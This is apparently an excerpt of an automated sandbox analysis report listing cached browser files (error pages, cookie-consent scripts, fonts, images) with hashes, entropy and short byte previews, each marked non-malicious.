                                                Encrypted:false
                                                SSDEEP:384:3OAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOfQWwY4RXrqt:I86qhbS2RpF3OsfQWwY4RXrqt
                                                MD5:DDD356C3D15DF3F06EF6772D05ED53D7
                                                SHA1:4A34AC5B1AD6F7B7A960AA55405625CD60BF4FE6
                                                SHA-256:62812A69A8398073B8F53B582C04B6FD214D07146A580035611F646E74922398
                                                SHA-512:9C8C6264D621A6D2EEA15B1BB627D221ABA1CB367030137B00B440E50CB1641B623C6A7E0C49220D2B35AAE93D1DEA4E819046982808BE596CAB7619E947D473
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":80,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\dnserror[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2997
                                                Entropy (8bit):4.4885437940628465
                                                Encrypted:false
                                                SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                MD5:2DC61EB461DA1436F5D22BCE51425660
                                                SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\errorPageStrings[1]
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):5.164796203267696
                                                Encrypted:false
                                                SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\http___cdn.taboola.com_libtrc_static_thumbnails_6375ef5dcb44b841a2c82f366826a986[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                Category:dropped
                                                Size (bytes):26657
                                                Entropy (8bit):7.9798401906633485
                                                Encrypted:false
                                                SSDEEP:768:/ORqeVG+9eGIxE0F3Q3+d3F46owLDWwF33wYa3pHt:/OA/pGKR9Qs3FJDDWwF3iFt
                                                MD5:4559F937497C9DB5AB43D5231D803695
                                                SHA1:B9900747CA64ECB9C21CFA4C81B0501354323878
                                                SHA-256:F97CA6FE875B9B889298FCA464481C43BF5BF67FE69A32125B198DF28B064638
                                                SHA-512:9BCD13166F91574CD81DA1999000A96C11D04E9E2535364555BE2B3F206977167FF3A3B29FC87B8E2E9682BE6BF30A3A8B89CE82A11BF0C113169BB8DD2B7BF2
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||......................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............7...............4..................................................................x,&.7./k.J.MLN.@..J.s. %.p.U............xU..0N.....$.%.P......]&$.c.=.D.........9)..$.=..2L..2^I....<..=.....=.Z.d.L..,..m$.r..^.o.i&...*Y].c-......2.K.].{I.o..k%Y$...%.W..K.7>h.j.......-..*.~....q..+.l.t..`.L.._.{R..I.s..n~L\.T.....2..(.Ol.c.X.f6^.}..~k...R.*.$2..].(e..G.X.......u8...h.F..xAb.g.d....Y..]J-d.M$.^.#......yF...Q..z..M...K......W..w..7%P.N....g@.....HR..]...P..3*.<d.........U:b.0....v.*.Is....u.elDx..W....#......n.. ..~y..ef.5%.....}.U.U%.%.mt....AS`..J.my$..H..\...}..!h.....J4yj.^-8D....&.j...GK.t<.....h..O2)"..2.[.;Z.8..>..a.......{....t.W.....pi..j....{.....g4.......c.....Z...7{%.56..}....G<.r.r:]-XTvi.M.C...V!D.$.A..I*y#.c24s.9.).z.3.E%.6.B.uq.5..\*g.<...).....:.e.6../)..:I....F.hF
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otFlat[1].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12282
                                                Entropy (8bit):5.246783630735545
                                                Encrypted:false
                                                SSDEEP:192:SZ1Nfybp4gtNs5FYdGDaRBYw6Q3OEB+q5OdjM/w4lYLp5bMqEb5PenUpoQuQJYQj:WNejbnNP85csXfn/BoH6iAHyPtJJAk
                                                MD5:A7049025D23AEC458F406F190D31D68C
                                                SHA1:450BC57E9C44FB45AD7DC826EB523E85B9E05944
                                                SHA-256:101077328E77440ADEE7E27FC9A0A78DEB3EA880426DFFFDA70237CE413388A5
                                                SHA-512:EFBEFAF0D02828F7DBD070317BFDF442CAE516011D596319AE0AF90FC4C4BD9FF945AB6E6E0FF9C737D54E05855414386492D95ABFC610E7DE2E99725CB1A906
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCIgcm9sZT0iZGlhbG9nIiBhcmlhLWRlc2NyaWJlZGJ5PSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGl0bGU8L2gzPjxwIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+dGl0bGU8L3A+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRhaW5lciI+PGgzIGNsYXNzPSJvdC1kcGQtdGl0bGUiPldlIGNvbGxlY3QgZGF0YSBpbiBvcmRlciB0byBwcm92aWRlOjwvaDM+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRlbnQiPjxwIGNsYXNzPSJvdC1kcGQtZGVzYyI+ZGVzY3JpcHRpb248L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwLXBhcmVudCIgY2xhc3M9Im90LXNkay10aHJlZSBvdC1zZGstY29sdW1ucyI+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwIj48YnV0dG9uIGlkPSJvbmV0cnVzdC1wYy1idG4taGFuZGxlciI+Y2h
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otPcCenter[1].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):47714
                                                Entropy (8bit):5.565687858735718
                                                Encrypted:false
                                                SSDEEP:768:4zg/3JXE9ZSqN76pW1lzZzic18+JHoQthI:4zCBceUdZzic18+5xI
                                                MD5:8EC5B25A65A667DB4AC3872793B7ACD2
                                                SHA1:6B67117F21B0EF4B08FE81EF482B888396BBB805
                                                SHA-256:F6744A2452B9B3C019786704163C9E6B3C04F3677A7251751AEFD4E6A556B988
                                                SHA-512:1EDC5702B55E20F5257B23BCFCC5728C4FD0DEB194D4AADA577EE0A6254F3A99B6D1AEDAAAC7064841BDE5EE8164578CC98F63B188C1A284E81594BCC0F20868
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .. {.. "name": "otPcCenter",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtcGMtc2RrIiBjbGFzcz0ib3RQY0NlbnRlciBvdC1oaWRlIG90LWZhZGUtaW4iIGFyaWEtbW9kYWw9InRydWUiIHJvbGU9ImRpYWxvZyIgYXJpYS1sYWJlbGxlZGJ5PSJvdC1wYy10aXRsZSI+PCEtLSBDbG9zZSBCdXR0b24gLS0+PGRpdiBjbGFzcz0ib3QtcGMtaGVhZGVyIj48IS0tIExvZ28gVGFnIC0tPjxkaXYgY2xhc3M9Im90LXBjLWxvZ28iIHJvbGU9ImltZyIgYXJpYS1sYWJlbD0iQ29tcGFueSBMb2dvIj48L2Rpdj48YnV0dG9uIGlkPSJjbG9zZS1wYy1idG4taGFuZGxlciIgY2xhc3M9Im90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIj48L2J1dHRvbj48L2Rpdj48IS0tIENsb3NlIEJ1dHRvbiAtLT48ZGl2IGlkPSJvdC1wYy1jb250ZW50IiBjbGFzcz0ib3QtcGMtc2Nyb2xsYmFyIj48aDMgaWQ9Im90LXBjLXRpdGxlIj5Zb3VyIFByaXZhY3k8L2gzPjxkaXYgaWQ9Im90LXBjLWRlc2MiPjwvZGl2PjxidXR0b24gaWQ9ImFjY2VwdC1yZWNvbW1lbmRlZC1idG4taGFuZGxlciI+QWxsb3cgYWxsPC9idXR0b24+PHNlY3Rpb24gY2xhc3M9Im90LXNkay1yb3cgb3QtY2F0LWdycCI+PGgzIGlkPSJvdC1jYXRlZ29yeS10aXRsZSI+TWFuYWdlIENvb2tpZSBQcmVmZXJlbmNlczwvaDM+PGRpdiBjbGFzcz0ib3QtcGxpLWhkciI+PHNwYW4gY2xhc3M9Im90LWxpLXRpdGxlIj5Db25zZW50PC9
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\otSDKStub[1].js
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):16853
                                                Entropy (8bit):5.393243893610489
                                                Encrypted:false
                                                SSDEEP:192:2Qp/7PwSgaXIXbci91iEBadZH8fKR9OcmIQMYOYS7uzdwnBZv7iIHXF2FsT:FRr14FLMdZH8f4wOjawnTvuIHVh
                                                MD5:82566994A83436F3BDD00843109068A7
                                                SHA1:6D28B53651DA278FAE9CFBCEE1B93506A4BCD4A4
                                                SHA-256:450CFBC8F3F760485FBF12B16C2E4E1E9617F5A22354337968DD661D11FFAD1D
                                                SHA-512:1513DCF79F9CD8318109BDFD8BE1AEA4D2AEB4B9C869DAFF135173CC1C4C552C4C50C494088B0CA04B6FB6C208AA323BFE89E9B9DED57083F0E8954970EF8F22
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: var OneTrustStub=function(e){"use strict";var t,o,n,i,a,r,s,l,c,p,u,d,m,h,f,g,b,A,C,v,y,I,S,w,T,L,R,B,D,G,E,P,_,U,k,O,F,V,x,N,H,M,j,K=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.genVendorsData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}};(o=t=t||{})[o.Unknown=0]="Unknown",o[o.BannerCloseButton=1]="BannerCloseButton",o[o.ConfirmChoiceButton
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\4996b9[1].woff
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                Category:dropped
                                                Size (bytes):45633
                                                Entropy (8bit):6.523183274214988
                                                Encrypted:false
                                                SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:ASCII text, with very long lines, with no line terminators
                                                Category:dropped
                                                Size (bytes):2955
                                                Entropy (8bit):4.796538193381466
                                                Encrypted:false
                                                SSDEEP:48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAmHHPk5JKIcFerZjSaSZjfumjVT4:OymDwb40zrvdip5GHZa6AyQshjUjVjx4
                                                MD5:8FCB3F61085635194CE5A73516DE39F9
                                                SHA1:4EF7BB8362EE512BD497C48C168085738EE010C3
                                                SHA-256:CEC95B7811CBF927FD338529A08F6B1BBF12F5B78459D07D15DE92C60C12DD64
                                                SHA-512:DB60AF665E02724F527C6781396105C456E56D23691A64F57BDD452C0568EF43DE36F63D8B18702A5C5A6FA29C9C16CD6ADEBB74E28BA94AF7291EAC3095861D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAKFpl8[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):585
                                                Entropy (8bit):7.555901519493306
                                                Encrypted:false
                                                SSDEEP:12:6v/7Zllj1AmzyaeU1glVfGHTT3H7LhChpt+ZnRE5b3Bz7Mf0Vg:S31hzm1GHTDbL0hpt+rE5bBY0Vg
                                                MD5:C423DAB40DA77CC7C42AF3324BFF1167
                                                SHA1:230F1E5C08932053C9EE8B169C533505C6CA5542
                                                SHA-256:3441B798B60989CF491AE286039CA4356D26E87F434C33DE47DC67C68E519E4B
                                                SHA-512:771F92666BE855C5692860F42EDB2E721E051AC1DC07FE7F1A228416375F196B444D82F76659FFF9877FD2483B26D1D6B64615803CA612BC9475BA3EE82A9E0D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=O.P.=..h....."..*.....Tu..a...*F..,.....R.....K.........$V.!.c.....F.e..{.y.{.L..J..s..=>...2.M.2|:..4,"...ag2(7"d..>...7.xA..~m. .....07ZP....6.|X\}.+`.?....~^.....A...p.6N.......`...*z......S.].h3.J....~..t...T.4c..{..P|b.....C..l.y........D.....6.@o.!........".}.a....B.+.....n...Z...+.8..z.._.qr..c.....J.R.[./u.KYO.RZ....X#S.-..G#..vR..S.4C ...w..HT3}|...y.?.[....R..&1."u......e..j..b/..=S../..'.T.!.~..u.....xQ.U..q.&...M........lH.W.D.aC....}.1...@.h...\.br..k........zar.....IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAKp8YX[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):497
                                                Entropy (8bit):7.3622228747283405
                                                Encrypted:false
                                                SSDEEP:12:6v/7YBQ24PosfCOy6itR+xmWHsdAmbDw/9uTomxQK:rBQ24LqOyJtR+xTHs+jUx9
                                                MD5:CD651A0EDF20BE87F85DB1216A6D96E5
                                                SHA1:A8C281820E066796DA45E78CE43C5DD17802869C
                                                SHA-256:F1C5921D7FF944FB34B4864249A32142F97C29F181E068A919C4D67D89B90475
                                                SHA-512:9E9400B2475A7BA32D538912C11A658C27E3105D40E0DE023CA8046656BD62DDB7435F8CB667F453248ADDCB237DAEAA94F99CA2D44C35F8BB085F3E005929BD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S=K.A.}{...3E..X.....`..S.A.k.l......X..g.FTD,....&D...3........^..of......B....d.....,.....P...#.P.....Y.~...8:..k..`.(.!1?......]*.E.'.$.A&A.F..._~.l....L<7A{G.....W.(.Eei..1rq....K....c.@.d..zG..|.?.B.)....`.T+.4...X..P...V .^....1..../.6.z.L.`...d.|t...;.pm..X...P]..4...{..Y.3.no(....<..\I...7T.........U..G..,.a..N..b.t..vwH#..qZ.f5;.K.C.f^L..Z..e`...lxW.....f...?..qZ....F.....>.t....e[.L...o..3.qX........IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AANg50h[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):40569
                                                Entropy (8bit):7.954892481469937
                                                Encrypted:false
                                                SSDEEP:768:ILhyA//Akly9981n74czNrDrLjXGik/48pcO0JPX3SEebK:IEmAkQ81Ug73UfefSEj
                                                MD5:B0989E31EDD523B96803E1AF9153AA0C
                                                SHA1:F0E256D8E5C95FF66618EAE588B074E4E5BAF831
                                                SHA-256:2F64ACD4B6DDBC2291738375B81AF48DFE287A731ECDF5AF977DFC53E3EB763A
                                                SHA-512:06A87F74E757AE2A341CB37AD6C9BD5351964B951D460FB52F25E44329B6283AFB456639E731A504EFD2BF49A2B4FD0691FF04FBA3C00E8AC031A7795992A3FC
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..?..b...{...m.z.T...1.:.n.P..x..f..q[.iN.....lFCP...f82b.$MR.*.......@.0.\.........k,g...................O..|Z...R....p...L....+.....&s.....}.;.k.[.)..v..y....L9K..^.R....SI..%..*(.-..._2...>a..t.y...R....n.l....Q.2.W.Z..eQ..9..K@.nv..2......;..)2...,l0.H...?...l..^....W;..u*...+jR..nu'S...g]....y.v,..kN.......E...Zw..E..}.w....../..Qt......._..t"....{x..e.....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AANuZgF[1].png
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):750
                                                Entropy (8bit):7.653501615166515
                                                Encrypted:false
                                                SSDEEP:12:6v/7Wrv0Y7COhH4wY2zKLlJsmUhrpB02KYMYv7LLMVjcS0mNUfozbbj3rtpQd3HO:xrcYOEV3KLXfIB9MYjHMVl0mKozbH3hv
                                                MD5:93D77F5C5FFACEBA12A1ABFC6190B947
                                                SHA1:8001474A7342EBF760C66F1C30E48E32E00F2AF3
                                                SHA-256:E6DA934C90931C6089ADB3D213DDD70C7104D0A182A98AB1C663CEDAE37F83A1
                                                SHA-512:D5F874DF89D82CC819B7D591766300FC701F0E1FFC6055D4CC4BA55F10674F88EDDA565EB1FA57886AC16A57926EBBBC9A108D45D057D76B904383247CE7EA50
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: .PNG........IHDR................a....pHYs..........+......IDATx..S]HSq...~l.F.af....j..i.(........ ._r...[.!jE.c.....(..\.5.a.X.b.sMj.M.{;....z.....?.......s.--}*..$S.._|..EEA.......*$Q...#N;.d2.a.UU.r.".*lh...k.2...<..S.$>L..,...`$..../*hmr.st+.3Y..(.o..U8.\..G........K...../..q....E...>.EQ..+.j..Y..S.0K... P.%.z....h..=.C.>.`.YD....1."3x......z.1.....$dId.@4U..iG*...Q....[c_.kg.h...._~.?6.....u .N....68.j"....Pv*..$h....S...!...7..h..C"1.".1.,...>.`....L...sF..<..)...}.X..w....J...n[u...V..g.....E.+N......O..R..Yt<.i.y.j.aOM.N_.A..t.i.4a.._...........z....yR[@-..=.x.:....b'h.jmd..../.........P.B.p9...U...wQ.EJhLpi.XJ.....x..B...;6..HT.S.xz....a.(k....f.#.4z..Z g.q......$Z..@y........B..........IEND.B`.
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOfZRW[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                Category:dropped
                                                Size (bytes):3093
                                                Entropy (8bit):7.883981124809078
                                                Encrypted:false
                                                SSDEEP:96:Qf7EjVwJE8Bk2ppZBt6s5sdskI5Gxo9y3:QjKwDBk2ppZrisJny3
                                                MD5:7C5FA8940D22DC4F3D60519B642B8C28
                                                SHA1:8D0F3497374593EE162727BE3A81915A55EF5578
                                                SHA-256:68A4A72586D9238169A10DE1D1FF65383240747BF93F88F527942D0E9B019F92
                                                SHA-512:DBBA752921646D24051236E2DD7CFFB3B611E3CAF3D300EC948FC1D8B51036D7B6E97E4590340306E8A2E3770088CE21D9BE553AAF0562E703067B06E4972699
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..HB..z.U"IS....0%..I>...z....a.s..HM.P[..........$.8.<#..,.O5....s.iY1..&./#y..._..h.Av..jv...y....F.*^^.].Y....A..fT...-.eG.Q..~.@...*Qn..3..\.$d....n.....ad..\..._....v...U.r.d.L.Z....C+...Y[8..7..BK+o2I.......8.Rq...y..#...1.j.A...B......-........*.N@'....q5bO..Rya[=4.bv<..N.Q.ym.D...<$:I.#.k..W.V)...4...{...n......Z..FtzM.....#..Q.C,_@.X.P`...SL.k....n.\.R.....5/m...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOfsCY[1].jpg
                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                Category:dropped
                                                Size (bytes):30752
                                                Entropy (8bit):7.906234754194529
                                                Encrypted:false
